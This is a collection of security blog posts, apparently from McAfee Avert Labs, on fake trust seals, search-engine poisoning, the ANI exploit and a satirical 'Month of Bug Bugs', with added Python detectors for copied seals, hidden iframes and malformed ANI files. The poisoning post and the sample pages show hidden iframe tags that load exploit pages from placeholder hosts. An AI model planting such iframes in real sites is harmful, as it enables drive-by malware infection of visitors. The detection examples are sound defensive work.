You could even try it for yourself here.
I was going to call this post “Trust me, I have a logo” - take your pick ;)

They are pretty easy to copy; even the ones with custom text on them could be faked easily. Their value comes from people associating them with data security, and through that perception they inspire confidence. Please remember, they are just logos! Companies use them because they provide reassurance and, most importantly, they increase sales. (Verisign have a good pdf on profitable usage.)

“71 percent of UK online shoppers will only make purchases through sites that include a trust mark.”

I’m not just picking on the SSL guys here; they really do provide better options than “logos”, as VeriSign’s Tim Callan notes on a recent blog. EV certs are available for $$$$, but for many the logo is good enough.
Oh, while I’m on the subject, the card companies have “nice logos” too.

Please think of these logos as a security reminder: exercise as much caution on sites displaying them as on any other site, and if need be re-enter the URL by hand in a new browser window.

Desperate Measures?

Recently Gartner slammed 3Com’s TippingPoint division for sponsoring a zero-day contest without giving the affected vendor, Apple Inc., a chance to fix the flaws first. They apparently paid a $10,000 bounty to Dino Dai Zovi, a well-regarded security researcher, at the recent CanSecWest conference.

Wow! It is rather ironic that a security company, which presumably wants to protect customers, will first put everyone at risk, not notify the vendor in time, and then release signatures! The anti-virus community, long the target of (bogus) claims that it writes viruses to make money, wouldn’t touch a contest like this with a barge-pole. In fact, even staunch full-disclosure advocates note the ethical disconnect implicit in security companies obtaining content earlier than their competitors via such initiatives (see http://blog.ncircle.com/archives/2005/08/3coms_zero_day_initiative_cest.html and our premier issue of Sage).

As security vendors, our mission is to protect our customers and the Internet community at large, not to create hype and FUD by giving the world a chance to exploit unpatched flaws! Failing to disclose to anyone leaves the good guys in the dark, but supporting irresponsible disclosure gives the bad guys night vision…

Do You Trust Your Search Engine?

I do. Usually. A bit less now.

I needed to find some flight information, so I entered an airport name into my favorite search engine and in no time at all I had a nice page with all the answers.
But wait. I may have misspelled the word “airport.” So what? The first entry looked just like what I wanted, so let’s click on it.

I was sent to a white page with the word “Ricerca…”, meaning “Searching…”, in the center. Not what I expected. And what’s the little dot in the top left corner? A hidden frame, maybe. Let’s see the source:

[iframe xsrc="http://[don't go here].info/it.html” frameborder=1 width=1 height=1 scrolling=no]

and then

[iframe xsrc="http://[don't go here either].com/on/vlad/” width=10 border=0 height=10 style=”visibility:hidden”]

What do you think? Could it be malicious?

To spare you the details I’ll tell you this loads a page filled with various exploits that will install a password stealer on your system, even if you don’t click anywhere.
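Both of the tricks in this category, the copied trust seal from the “Why would you trust a logo?” post above and the one-pixel or invisible off-site frames shown here, can be checked for mechanically. The following is an added example (my code, not anything from the original posts or from McAfee): it uses Python's standard HTML parser to flag seal links whose dn parameter names a host other than the one the page was actually served from, and iframes that are tiny or styled invisible and load from another site. The sample pages are constructed, the hostnames in them are placeholders, and the iframes use a real src attribute rather than the defanged xsrc spelling used above.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

SEAL_HOST = "seal.verisign.com"   # host the seal images on the page link to
TINY_PX = 10                      # frames this small are not meant to be seen


class TagCollector(HTMLParser):
    """Collect every <a href> and every <iframe> (with its attributes) on a page."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self.links.append(attrs["href"])
        elif tag == "iframe":
            self.iframes.append(attrs)


def seal_mismatches(html, page_host):
    """Hosts named in seal links ('dn' parameter) that differ from the host the
    page was really served from. A copied seal still 'verifies' the original site."""
    p = TagCollector()
    p.feed(html)
    bad = []
    for href in p.links:
        u = urlsplit(href)
        if u.netloc.lower() != SEAL_HOST:
            continue
        dn = parse_qs(u.query).get("dn", [""])[0].lower()
        if dn and dn != page_host.lower():
            bad.append(dn)
    return bad


def _px(value):
    """Parse a width/height attribute such as '1' or '10px'; None if not numeric."""
    try:
        return int(str(value or "").strip().rstrip("px"))
    except ValueError:
        return None


def hidden_iframes(html, page_host):
    """src of every off-site iframe that is tiny or styled invisible."""
    p = TagCollector()
    p.feed(html)
    found = []
    for a in p.iframes:
        src = a.get("src") or ""
        host = urlsplit(src).netloc.lower()
        if not host or host == page_host.lower():
            continue              # relative or same-site frame: not the pattern we want
        style = (a.get("style") or "").replace(" ", "").lower()
        dims = (_px(a.get("width")), _px(a.get("height")))
        tiny = any(d is not None and d <= TINY_PX for d in dims)
        invisible = "visibility:hidden" in style or "display:none" in style
        if tiny or invisible:
            found.append(src)
    return found


# Constructed sample pages; the hostnames are placeholders, not real sites.
PHISH_PAGE = """<html><body><h1>Sign in to eBay</h1>
<a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SCGI.EBAY.COM&lang=en">
<img src="seal.gif" alt="VeriSign Secured"></a></body></html>"""

POISONED_PAGE = """<html><body><p>Ricerca...</p>
<iframe src="http://redirector.example/it.html" frameborder=1 width=1 height=1 scrolling=no></iframe>
<iframe src="http://exploit-kit.example/on/vlad/" width=10 border=0 height=10 style="visibility:hidden"></iframe>
<iframe src="/ads/banner.html" width=468 height=60></iframe>
</body></html>"""

if __name__ == "__main__":
    print(seal_mismatches(PHISH_PAGE, "ebay-secure-login.example"))   # ['scgi.ebay.com']
    print(seal_mismatches(PHISH_PAGE, "scgi.ebay.com"))               # []
    print(hidden_iframes(POISONED_PAGE, "www.search-hit.example"))    # the two off-site frames
```

The seal check is deliberately narrow: it only asks whether the site the seal vouches for is the site you are on, which is exactly the question the logo itself never answers. The iframe check is a heuristic, not a verdict; legitimate pages do use small frames, so treat a hit as a reason to read the source, as in the post, rather than as proof of an exploit.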

The use of search engine poisoning is not new. What’s interesting here is the malware author’s successful attempt to maintain a low profile.

Poisoning a search engine for a misspelled word lowers the chance of being spotted. Drawing too much attention works only for short periods; this way the attacker gets a steady rate of newly infected systems without anyone noticing.

Also, the “it.html” part of the hidden frame reflects the fact that I was running the search from Italy. How many security companies do research in Italy? Well, we do, but not many others.

The bad guys are getting smarter. So what can we do to fight back? I know I’m going to sound like I’m wearing my McAfee hat, but here’s a link that can really help: SiteAdvisor. It gives you, with a visual flag, some quick advice on the safety of the site you are about to click on. Maybe the site you thought you found isn’t really what you were looking for. A useful tip.

Browse safe!

Our new CEO is a-blogging!!!!!

McAfee Avert Labs welcomes our new CEO Dave DeWalt aboard. Check out his first blog post on our sister blog Security Insights.

S-s-s-something From the Comments

(With props to Ze Frank!)

sleepdoc Says: I love you guys who act like the IT guy on the SNL skit, “Jeez, one could easily manually remove the malware via autoruns or similar tool. …” Right, like the average user has any idea what you mean.

There is a very wide range of technical experience levels among readers of this blog, and it can be very difficult for us to write for all possible levels. So, we’ll conduct a little experiment: Periodically I’ll post a breakdown for those of us who are less technically inclined, to explain a security concept in layman’s terms.

This is where you come in: If this is helpful, let me know. If I’m still being too heavy on the geek-speak, let me know that, too. If you have a specific request, fire away. I’d like this to be as universally useful as possible.

So, here’s a basic breakdown of the ANI exploit situation:

There are a huge number of innocent Web sites–hacked by the same group that hacked the Superbowl site–that are hosting a file which exploits an unpatched hole in many recent Windows versions. The file was created in such a way that it can cause a system to download and run malware.

What that means to you and me is that either just by searching around to our favorite sites, or by following links in e-mail, we could be going to sites that are hacked to contain this malicious ANI file. We’re not talking about searching just for pr0n or warez or something, but regular, everyday Web sites.

If your system is vulnerable, you will not see the exploit run; you may not see much of anything out of the ordinary. And from there, it could be silently pulling other nasty things down onto your machine. There is currently no patch or workaround from Microsoft to fix this. That’s why this threat is such a big deal.

Adding to this scariness is that these ANI files are being frequently tweaked by the hackers so they can evade antivirus detection. We’ve added generic detection for these malformed files as new ones are found, and this has been working quite well so far at proactively picking up brand new variants. Having a firewall can also help stop those new files that are being downloaded by the ANI files, as those are being frequently updated too. (These downloader trojans are, very generally, what Ned was discussing in his comment)

The bottom line here is to be extra vigilant about updating your virus definitions frequently, and make sure you have a firewall. Keep an eye on Microsoft’s site for an update; they’re planning on releasing a patch tomorrow. Don’t run files, especially ones arriving by e-mail, that promise to be Microsoft updates or patches. Get your patches directly from Microsoft.
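The post keeps the ANI details at a layman's level and says only that the hostile files are “malformed” and that generic detection of such malformed files works well. For readers who want to see what a structural check of that kind can look like, here is an added example (my code, not McAfee's detection logic, and the post does not describe which malformation the attackers use). An ANI file is a RIFF container of type ACON whose header lives in an anih chunk of exactly 36 bytes (nine DWORD fields); this walker enforces only that published structure: chunk sizes that overrun the file, a missing or duplicated anih chunk, or an anih chunk of the wrong size. The sample byte strings are constructed in the code.

```python
import struct

ANIH_SIZE = 36  # sizeof(ANIHEADER): nine DWORD fields in a RIFF ACON file


def ani_anomalies(data):
    """Walk the RIFF chunks of an ANI file and return a list of structural
    problems. An empty list means the container is well-formed; it says
    nothing about the icon frames inside it."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON (ANI) file"]
    problems = []
    declared = struct.unpack_from("<I", data, 4)[0]
    if declared + 8 != len(data):
        problems.append(f"RIFF header declares {declared + 8} bytes, file is {len(data)}")
    anih_seen = 0

    def walk(start, end):
        nonlocal anih_seen
        pos = start
        while pos + 8 <= end:
            fourcc = data[pos:pos + 4]
            size = struct.unpack_from("<I", data, pos + 4)[0]
            body = pos + 8
            if body + size > end:
                problems.append(f"{fourcc.decode('latin-1')!r} chunk claims {size} bytes, "
                                f"only {end - body} remain")
                return
            if fourcc == b"LIST":
                walk(body + 4, body + size)      # skip the 4-byte list type, recurse into it
            elif fourcc == b"anih":
                anih_seen += 1
                if size != ANIH_SIZE:
                    problems.append(f"anih chunk #{anih_seen} is {size} bytes, expected {ANIH_SIZE}")
            pos = body + size + (size & 1)       # RIFF pads odd-sized chunks to an even length
        if pos != end:
            problems.append(f"{end - pos} trailing byte(s) not covered by any chunk")

    walk(12, len(data))
    if anih_seen == 0:
        problems.append("no anih header chunk")
    elif anih_seen > 1:
        problems.append(f"{anih_seen} anih chunks, expected exactly one")
    return problems


def _chunk(fourcc, payload):
    """Encode one RIFF chunk with the mandatory even-length padding."""
    return fourcc + struct.pack("<I", len(payload)) + payload + (b"\0" if len(payload) & 1 else b"")


def build_ani(chunks):
    """Wrap chunks in a RIFF/ACON container (used here only to construct samples)."""
    body = b"ACON" + b"".join(chunks)
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed samples: a minimal valid header and two malformed variants.
GOOD_ANI = build_ani([_chunk(b"anih", bytes(ANIH_SIZE))])
OVERSIZED_ANI = build_ani([_chunk(b"anih", bytes(ANIH_SIZE)), _chunk(b"anih", bytes(60))])
TRUNCATED_ANI = GOOD_ANI[:-10]   # the chunk size now points past the end of the file

if __name__ == "__main__":
    for name, sample in [("good", GOOD_ANI), ("oversized", OVERSIZED_ANI), ("truncated", TRUNCATED_ANI)]:
        print(name, ani_anomalies(sample) or "ok")
```

A check like this catches files that do not obey the format's own rules regardless of which variant's byte pattern they carry, which is the sense in which the post calls the detection generic; it is a complement to signatures, not a replacement, since a file can be structurally valid and still carry a hostile payload elsewhere.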

Next up: Firewalls 101 - what is an “open” port and why should I care?

McAfee Avert Labs to Host Month of Bug Bugs (MoBB)

During each day of the Month of Bug Bugs McAfee Avert Labs will provide analysis of flawed malicious code (aka bugs). These are viruses that don’t spread, password stealing Trojans that can’t leave the stable, drive-by attacks that crash and burn, phishing attacks that phlop, denial of service attacks that are denied, etc. Our analysis will highlight the errors made by authors, and show how these threats can be fixed and in most cases optimized for maximum potency.

Why have a Month of Bug Bugs?
McAfee Avert Labs is constantly looking at ways to respond to threats more quickly, and to deliver timely and accurate information. The goal of the Month of Bug Bugs is to increase researcher efficiency. On a daily basis researchers waste countless hours trying to replicate viruses and reproduce exploits and other malicious code that is poorly written and non-functional. If the authors would learn how to code these threats correctly in the first place, researchers could respond to more threats — more quickly. The Month of Bug Bugs is meant to highlight the common mistakes made by malicious code authors, and save our researchers the trouble.

Additionally, our researchers are sick and tired of Leetspeak used by @uth0r$. The poor display of grammatical and spelling skills contained in today’s threats is appalling and we will no longer perpetuate such ignorance. Therefore, not only will we be fixing technical bugs, we will also correct all grammatical and spelling mistakes made by malcode authors; this includes any improper salutations, such as “greetz”. Any personal messages in the code will be held to formal letter-writing standards “Dear Sir or Madam”, “To Whom It May Concern:”, etc.

Lastly, we’ll address the deplorable lack of consistent naming conventions in the source code that we analyzed and will re-write functions and variables utilizing one of the many standards in programming (Hungarian, Pascal, Camel notation, etc).

McAfee Avert Labs recognizes that this stance may be somewhat controversial, but we do feel that the benefits will outweigh the costs. In anticipation of resistance within the security community, we have prepared this FAQ:

Why would you want to fix broken malicious code in the first place?
Testing existing defenses often requires a working threat. To make definitive coverage statements, we need threats to work as they’re supposed to.

But why is protecting against broken threats necessary?
It’s not, BUT if we can fix a bug, so can the authors or someone else. We’re not being proactive if we don’t anticipate the next move of the attackers.

Aren’t you concerned that the end result will be more potent and infectious threats?
Yes, we do expect some collateral damage to occur; data will be lost, identities stolen, systems inaccessible, etc. But, you have to consider the trade-offs. Currently the well organized and well funded crimeware authors do a good job of testing their threats. It’s the less organized groups and individual authors that write the poorest code. These authors don’t have the same resources as the major players. So security researchers end up spending the most time on those threats that they should be spending the least time on.

Where can I submit my malicious code for review?
If you would like feedback on your malicious code, you can submit it here.

When will the Month of Bug Bugs start?
The Month of Bug Bugs will begin May 1, one month after April Fool’s Day.

Did the SEC Frag a Stock Spammer?

One stock spammer is moving to European stocks shortly by the look of it.

My colleague Kevin McGhee just noticed this long-term stock spammer’s offer to pump European stock prices. They are looking for partners in spamming (“pile email advertising”: oooh, that’d be spam then). We chatted about this for some time and feel that the SEC might have captured the flag of at least this spammer with its recent move.

Take a look at the text:

Body of the spam

The freeze was for 10 days? Well, iPackets certainly wants to sort it out A.S.A.P., according to its recent announcement and the three binders full of info sent to the SEC. The question I ask is: with all this publicity, what’ll happen next? Could the spammers or their partners still benefit if they continue to hold these stocks?

McAfee Avert Labs Official PodCast - AudioParasitics

Today marks the launch of the official podcast of McAfee Avert Labs - AudioParasitics!!!!

AudioParasitics

A podcast with attitude, irreverence and difference. One day we may discuss disclosure, another day zero-day trends, yet another it might be new rootkit functionality. No matter. Rest assured that AudioParasitics will be there to beat that issue into submission with its two opinionated hosts (myself and the multi-talented Jim Walter) and a variety of the security industry’s finest minds.

Check us out at the AudioParasitics home page and also subscribe through iTunes.

McAfee SiteAdvisor Technology Honored at RSA2007

Alright, maybe it is not exactly research related but I think it’s pretty cool. We previously announced that McAfee SiteAdvisor has been acknowledged by the U.S. Department of Commerce with its “Recognition of Excellence in Innovation” honor. The award was presented by the Honorable Robert Cresanti, U.S. Under Secretary of Commerce for Technology, for the technology’s innovative approach to making the Internet a safer place to search and surf for consumers.

A couple of pics below from the McAfee RSA booth:

SiteAdvisor Award 1

SiteAdvisor Award 2

That is McAfee’s CTO Christopher Bolin (in the middle) receiving the award from Under Secretary of Commerce Cresanti with McAfee’s Interim CEO Dale Fuller to the left.

Huliq has a nice writeup of it available here.

Introducing the McAfee Mini-Cooper!!!!

Yes the rumors are true. We have confirmed sightings of the highly anticipated but never duplicated McAfee Mini-Cooper!

Remember to stop by our RSA booth, check out the demos and get free rides in the McAfee Mini-Cooper!!!!

McAfee Avert Labs at RSA

This marks the first year that Avert Labs has a direct presence at RSA. We will be running some very cool demos at the McAfee booth and answering questions about our research happenings. Some of the demos include password-stealing trojans, a botnet in action, and the coolest drive-by rootkit installation ever!!! Make sure you stop by booth 1730 and say “Sup Dawgs!”

We also know how hard it can be to try and catch a cab around the Moscone Center, so on Tuesday and Wednesday we will be offering free rides from RSA to any nearby location in San Francisco. Just look for the black Mini Coopers displaying the McAfee logo!